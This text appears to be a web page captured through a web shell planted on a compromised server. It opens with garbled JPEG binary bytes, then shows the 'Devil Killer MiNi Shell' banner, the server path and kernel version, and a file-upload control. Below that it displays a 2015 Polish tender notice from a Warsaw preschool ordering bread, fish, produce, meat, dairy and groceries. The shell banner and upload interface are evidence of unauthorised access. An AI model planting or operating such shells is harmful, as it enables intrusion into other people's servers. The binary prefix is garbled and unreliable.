JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151204/178937-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na pakiety</b><br>
<b>Numer ogłoszenia: 178937 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 12 , ul. Niska 9, 00-176 Warszawa, woj. mazowieckie, tel. 22 831 72 09, faks 22 831 72 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole12.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, nie przekraczających łącznie 20% wartości udzielonego zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole12.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 12, ul. Niska 9, 00-176 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 10:00, miejsce: Przedszkole Nr 12, ul. Niska 9, 00-176 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułki z ziarnem -50- 60g bez konserwantówi ulepszaczy	szt.	300
BUŁKA GRAHAMKA, bez konserwantów i polepszaczy, z obniżoną zawartością soli, bez dodatku cukru i substancji słodzących.50-60g	szt.	300
BUŁKA KAJZERKA PSZENNA, bez konserwantów i polepszaczy, z obniżoną zawartością cukru i soli, 50-60g	szt.	1300
BUŁKA MAŚLANA, bez konserwantów i polepszaczy, z obniżoną zawartością soli, bez dodatku cukru i substancji słodzących.50-60g	szt.	600
BUŁKA TARTA, 500g	szt.	20
BUŁKA WROCŁAWSKA 300-350g, bez konserwantów i polepszaczy, krojona lub nie, na drożdżach świeżych, z obniżoną zawartością cukru i soli.	szt.	750
CHAŁKA  PSZENNA TRADYCYJNA, bez konserwantów i polepszaczy, z obniżoną zawartością cukru i soli, 450-500g	szt.	50
CHLEB , z mąki żytniej , bez konserwantów i polepszaczy, krojony lub nie, na zakwasie,z obnizona zawartością cukru i soli 400-600g	szt.	250
CHLEB PEŁNOZIARNISTY, z mąki pszenno-żytniej z ziarnami słonecznika, bez konserwantów i polepszaczy, krojony lub nie, na zakwasie,z obnizoną zawartością cukru i soli 400-600g	szt.	200
CHLEB PYTLOWY, bez konserwantów i polepszaczy ,na zakwasie 600g, nie odświeżany, z obniżoną zawartością soli, bez cukru i substancji słodzących.	szt.	200
CHLEB WIEJSKI, krojony lub nie, z obnizoną zawartością cukru i soli 500-600g	szt.	700
chleb razowy na miodzie bez konserwantów i ulepszaczy400-600	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby i mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILET Z MIRUNY, mrożony, płaty shp/bs, opakowanie (szaterpack) 6,8-7,0kg	kg	50
FILET Z DORSZA,shpb/s rosyjski - opakowanie 6,8 kg.	kg	80
FILET Z ŁOSOSIA, mrożony, ze skórą, nie więcej niż 3% glazury technologicznej, opakowanie 1700g-2000 g	kg	30
FILET Z MINTAJA, mrożony, filet bez skóry i ości, max. 3% glazury technologicznej, opakowanie folia lub karton 2500-5000g	kg	40
FILET Z SOLI, mrożony, filet bez skóry i ości, max. 3% glazury technologicznej, opakowanie folia lub karton 2500-5000g	kg	60
FILET Z TILAPII, mrożony, filet bez skóry i ości, max. 3% glazury technologicznej, opakowanie folia lub karton 2500-5000g	kg	50
MAKRELA WĘDZONA (świeża, zapakowana hermetycznie, duże tusze)	kg	2
MROŻONKA BROKUŁY (różyczki), opakowanie 2500g	kg	25
MROŻONKA BUKIET WARZYW, zawiera brokuły, marchew, kalafior, opakowanie 2500g	opakowanie	10
MROŻONKA CZARNA PORZECZKA, bez szypułek, opakowanie 2000-2500g	opakowanie	10
MROŻONKA FASOLKA SZPARAGOWA ZIELONA/ŻÓŁTA, cięta, oczyszczona, opakowanie 2000-2500g	opakowanie	10
MROŻONKA GROSZEK, opakowanie 2000-2500g	opakowanie	20
MROŻONKA JAGODA, bez szypułek, opakowanie 2000-2500g	opakowanie	5
MROŻONKA KALAFIOR (różyczki), opakowanie 2000-2500g	opakowanie	10
MROŻONKA  -borówka amerykańska, opakowanie  	kg	10
MROŻONKA kostka mrożona -brzoskwinia, opakowanie kg	kg	10
MROŻONKA kostka mrożona -kiwi,  kg	kg	5
MROŻONKA kostka mrożona -morela,   kg	kg	10
MROŻONKA MALINA, bez szypułek, opakowanie 2000-2500g	kg	60
MROŻONKA MARCHEWKA MINI, opakowanie 2000-2500g	kg	5
MROŻONKA MARCHEWKA Z GROSZKIEM, opakowanie 2000-2500g	kg	5
MROŻONKA MIESZANKA KOMPOTOWA, opakowanie 2500-3000g	kg	140
MROŻONKA SZPINAK LIŚCIASTY, opakowanie 2500-3000g	kg	15
MROŻONKA TRUSKAWKA, bez szypułek, opakowanie 2000-2500g	kg	110
MROŻONKA ZUPA JARZYNOWA, opakowanie 2000-2500g	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ARBUZ klasa I lub II wg Rozporządzenia Komisji WE nr 1093/97 (dostawa w sezonie)	kg	200
BANANY klasa I lub II wg Rozporządzenia Komisji WE nr 2257/94 odmiana CONSUL, TURBAN, MONITA, CHIQUITTA (listopad-marzec)	kg	250
BANANY klasa I lub II wg Rozporządzenia Komisji WE nr 2257/94,  odmiana CONSUL, TURBAN, MONITA, CHIQUITTA (kwiecień-październik)	kg	200
BOTWINA, pęczek 400-500g, wielkość sezonowa	pęczek	115
BROKUŁY, różyczki zwarte, barwa intensywna zielona, min. 400g	szt.	50
BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia	kg	300
CEBULA BIAŁA (bez szczypioru), wielkość średnia	kg	250
CYTRYNA (średnia wielkość)	kg	150
CZOSNEK ŚWIEŻY (min. 80g), krajowy	szt.	90
DYMKA ZE SZCZYPIOREM, pęczki wielkość sezonowa	pęczek	10
DYNIA	kg	50
FASOLA BIAŁA SUCHA, drobna, opakowanie 1000g 	kg	30
FASOLKA SZPARAGowa zielona , bez łyka kg	kg	30
GREJFRUT CZERWONY 	kg	10
GROCH ŁUSKANY, opakowanie 1000g	kg	25
GRUSZKI (kwiecień-październik, krajowe)	kg	130
JABŁKA KOMPOTOWE (np. Reneta, Antonówka, krajowe)	kg	50
JABŁKA, typu cortland, ligol champion, delikates, rubin, jonagored, średnia wielkość, 	kg	2000
JAJA KONSUMPCYJNE KURZE, świeże (z chowu klatkowego, klasa L duże - 63-73g), zdezynfekowane za pomocą promienia ultrafioletowego	szt.	6500
KALAFIOR (min. 800g)	szt.	45
KALAREPKA	kg	5
KAPUSTA BIAŁA (główka 2000-3000g)	kg	150
KAPUSTA CZERWONA, główka 2000-2500g	szt.	60
KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5000g	kg	160
KAPUSTA MŁODA, główka min. 800g (maj-czerwiec)	szt.	65
KAPUSTA PEKIŃSKA (foliowana)	pęczek	20
KIWI (sztuka 15-20g, dostawa na palecie)	kg	100
KOPEREK (natka), pęczek, wielkość sezonowa	kg	100
MANDARYNKA, bezpestkowa	kg	70
MARCHEW KAROTKA, wielkość średnia, bez naci	kg	600
OGÓREK KISZONY w naturalnym kwasie z koprem i solą (wiaderko, pojemność 3000-6000g)	kg	180
OGÓREK MAŁOSOLNY, w naturalnym kwasie z koprem i solą (wiaderko, pojemność 3000-6000g)	kg	70
OGÓREK ZIELONY SZKLARNIOWY ŚWIEŻY (kwiecień-październik)	kg	40
OGÓREK ZIELONY SZKLARNIOWY ŚWIEŻY (listopad-marzec)	kg	40
PAPRYKA CZERWONA (kwiecień-październik)	kg	50
PAPRYKA CZERWONA (listopad-marzec)	kg	50
PIECZARKI	pęczek	50
PIETRUSZKA	kg	250
PIETRUSZKA (natka, wielkość sezonowa)	kg	250
POMARAŃCZE TYPU NOWELINA, cienka skórka	kg	210
POMIDORY CZERWONE (kwiecień-październik)	kg	200
POMIDORY CZERWONE (listopad-marzec)	pęczek	100
POR	kg	270
RZODKIEWKA, okrągła, pęczki 180-250g	szt.	350
SAŁATA LODOWA (pakowana każda główka osobno), waga jednej sztuki min. 350g	kg	35
SAŁATA MASŁOWA KRUCHA, główka min. 150g	szt.	300
SELER KORZENIOWY	kg	260
SZCZAW ŚWIEŻY	kg	1
SZCZYPIOREK ŚWIEŻY, pęczek, wielkość sezonowa	szt.	120
ŚLIWKI DESEROWE TYPU WĘGIERKA/PREZYDENT,dojrzałość konsumpcyjna, odchodzące od pestek (wrzesień-grudzień, krajowa)	kg	150
TRUSKAWKA, krajowa, odmiana konsumpcyjna, w całości wybarwiona, dostawa w łubiankach, ( maj-czerwiec )	kg	200
WINOGRONA JASNE/CIEMNE, kiście zagraniczne	kg	150
ZIEMNIAKI MŁODE, średniej wielkości, (maj-czerwiec)	kg	550
ZIEMNIAKI, typu Irga, konsumpcyjne, umyte, skórka bez zielonych zabarwień, bez kiełkujących oczek, wielkość średnia, 	kg	4000
NATURALNY SOK TŁOCZONY 100%, pasteryzowany, zawierający min. 1500g owoców na 1000ml soku, smaki: jabłko, jabłko-aronia, jabłko-gruszka, jabłko marchew, opakowanie karton 5000ml	opakowanie	120
Imbir świeży	kg	1
ŻUREK TYPU STAROPOLSKI, opakowanie butelka 400-500 ml, składniki: liść laurowy, czosnek, mąka pszenna.	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CIELĘCINA ZADNIA, bez kości, kawałki min. 500g, świeża, nie rozmrażana	kg	30
INDYK FILET Z PIERSI, przedział wagowy 1000-1500g, świeży, bez skóry, bez kości, nie rozmrażany	kg	50
KIEŁBASA CIENKA TYPU PODWAWELSKA/TORUŃSKA, mięso wieprzowe min. 84%	kg	60
KURCZAK FILET Z PIERSI, świeże, nie rozmrażane, bez skóry, bez chrząstki, pojedyncze w przedziale wagowym 300-400g	kg	50
porcje rosołowe świeże                                                                 	kg	220
PARÓWKI WIEPRZOWE ODTŁUSZCZONE, wędzone, parzone, zawierają min. 68% mięsa wieprzowego	kg	15
Parówki cielęce,  bez dodatków, o zawartosci mięsa min80%	kg	110
KABANOSY DROBIOWE , BEZ DODATKÓW, min.80%	kg	40
PODGARDLE, surowe, bez dodatków,  bez skóry, świeże, nie rozmrażane, pakowana hermetycznie 1000g	kg	10
WĄTRÓBKA Z INDYKA ,świeża nie rozmrażana.	kg	12
WĘDLINA - KIEŁBASA KRAKOWSKA PARZONA, mięso wieprzowe 90%	kg	25
WĘDLINA - POLĘDWICA SOPOCKA min 90% mięsa	kg	30
WĘDLINA - POLĘDWICA Z INDYKA	kg	70
WĘDLINA - SZYNKA WIEJSKA CHUDA, min. 67% mięsa wieprzowego, bez tłuszczu	kg	60
WIEPRZOWINA - ŁOPATKA, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża, nie rozmrażana, kawałki 1000-1500g	kg	136
WIEPRZOWINA - MIĘSO Z SZYNKI, bez kości, bez tłuszczu, kawałki 1000-1500g oraz kulki, świeże, nie rozmrażane	kg	68
WIEPRZOWINA - SCHAB ŚRODKOWY BEZ KOŚCI, o średnicy nie większej niż 10cm, świeży, słonina zdjęta, nie rozmrażany, kawałek 1500-2000g	kg	240
WOŁOWINA - ANTRYKOT, z kością	kg	45
WOŁOWINA - SZPONDER, chudy, surowy, barwa tłuszczu - biała, paski długości do 40cm, szerokość do 12cm, świeży, nie rozmrażany	kg	45
Podudzie z kurczaka,	kg	200
kurczak świeży, nie rozmrażany	kg	180
WOŁOWINA - UDZIEC BEZ KOŚCI, (z młodych sztuk, extra)	kg	65.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Favita Mlekowita SERmozarella z mleka krowiego żółta-12% tłuszczu mięki solankowy, opakowanie 270g-300g	szt.	50
JOGURT NATURALNY PITNY, opakowanie karton 0,4 l	szt.	120
JOGURT TYPU GRECKI, zagęszczony, opakowanie plastikowe 400g	szt.	40
MASŁO EXTRA, opakowanie 200g,  min. 82% tłuszczu, bez dodatku tłuszczów roślinnych 	szt.	1500
MLEKO 2% UHT, długoterminowe, w kartonie, opakowanie 1000ml	l	180
MLEKO 2% pasteryzowane, homogenizowane , w opakowanie 1000ml opakowanie foliowe	l	1320
MLEKO 2%, pasteryzowane, homogenizowane, opakowanie folia 1000mlz dopłatą	L	1320
NAPÓJ SOJOWY-op. 1l	szt.	10
SER ŻÓŁTY (GOUDA/EDAM/RYCKI), łagodny o zawartości tłuszczu 45%, zawartość sera min. 90%, pakowany w bloki 1000-1500g z dopłatą	kg	40
SER ŻÓŁTY (GOUDA/EDAM/RYCKI), łagodny o zawartości tłuszczu 45%, zawartość sera min. 90%, pakowany w bloki 1000-1500g 	kg	40
ŚMIETANA 18%, opakowanie 400-500ml	szt.	300
ŚMIETANA 30%, opakowanie 1000ml	szt.	130
Twarożek waniliowy bez konserwantów 200g	szt.	120
Maślanka opakowanie 1 litr	l	30
Kefir 1 litr	l	30
TWARÓG PÓŁTŁUSTY, klasa 1, opakowanie folia o pojemności 250-500g, zawartość tłuszczu 3,5-5%	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ANANAS KONSERWOWY, opakowanie puszka 550-650g 	szt.	25
BAZYLIA SUSZONA, opakowanie 10-15g	szt.	15
BRZOSKWINIE POŁÓWKI  800-850g puszka, lekko słodzone	szt.	35
BUDYŃ ŚMIETANKOWY, opakowanie 35-40g, bez sztucznych barwników, wydajność z paczki min. 500ml	szt.	150
CHRUPKI KUKURYDZIANE KRĘCONE 90G-100G,GRYS KUKURYDZIANY	szt.	20
CHRZAN TARTY, opakowanie słoik 260-300g, bez dodatku octu	szt.	20
CIASTECZKA OWSIANE-64,3% z pełnego ziarna owsa, bez dodatku pszenicy,138g	szt.	25
CIASTECZKA ZBOŻOWE, różne rodzaje: owsiane, sezamowe, z owocami, orkiszowe, opakowanie 250-300g	kg	25
CIECIERZYCA -TYPU SANTE ,op. 350g	szt.	20
CUKIER BIAŁY, drobny kryształ, opakowanie 1000g	szt.	530
CUKIER PUDER (opakowanie 400-500g)	op	15
CUKIER WANILINOWY opakowanie 32g 	szt.	400
CURRY opakowanie 15-20g	szt.	30
CYNAMON, opakowanie 10-15g	szt.	25
